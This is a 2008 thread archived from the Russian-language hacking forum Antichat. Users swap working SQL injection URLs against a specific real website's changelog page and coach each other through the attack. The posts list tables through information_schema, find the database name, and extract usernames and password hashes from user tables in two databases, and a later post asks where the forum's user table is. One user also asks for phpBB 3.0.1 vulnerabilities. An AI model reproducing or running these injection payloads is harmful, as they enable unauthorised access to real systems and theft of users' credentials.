ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.10.2008, 14:12
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Там таблицы те лежат просто в другой БД
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
05.10.2008, 14:24
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от Велемир
А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.
Начнем с того что никакого мата вовсе и небыло! А для тугих задаю вопрос вновь, какие уязвим есть У phpBB 3.0.1 ??
Сообщение от n0ne
з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(
Эт ты к чему говоришь? Всмысле тебе меня жаль?
Сообщение от Spyder
geforce, тебе тут никто ничего не должен
Ты не знаешь должны мне здесь или нет по этому попрошу без своего трёх капеечного флуда по этой теме лучшеб подсказала!
|
|
|
|
05.10.2008, 14:31
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от l-l00K
Там таблицы те лежат просто в другой БД
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
Попробу сначало посмотреть что там вобще имеется
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/
|
|
|
|
05.10.2008, 14:32
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.
|
|
|
|
05.10.2008, 14:35
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от iddqd
1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.
1) Меня спросили я ответил!
2) Поискал не беспокойся!
3) Учту! (Аватар интересный  )
|
|
|
|
05.10.2008, 14:52
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Сообщение от geforce
Попробу сначало посмотреть что там вобще имеется
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/
А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем той таблицы, ты данных не получишь
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 05.10.2008 в 14:59..
|
|
|
|
05.10.2008, 14:58
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от l-l00K
А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем таблицы, ты данных не получишь
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,databa se(),8/**/
Название бд tinymce!
|
|
|
|
05.10.2008, 15:00
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Название текущей БД tinymce, а БД где лежит tbl_user называется moxieforge
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
05.10.2008, 15:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
geforce, я эти ссылки дал тебе не просто так. Если есть сплойты в паблике, то они есть там.
|
|
|
|
05.10.2008, 15:23
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Так вроде бы все хорошо но...
Хочется достать логин и пасс форума
Вот делаю запрос
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+moxieforge.punbb_users+limit+1,1/*
не проходит
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce.punbb_users+limit+1,1/*
Не проходит делаю запрос другой
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
не проходит
Вопрос.
Где же может валятся таблица с юзверями форума? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
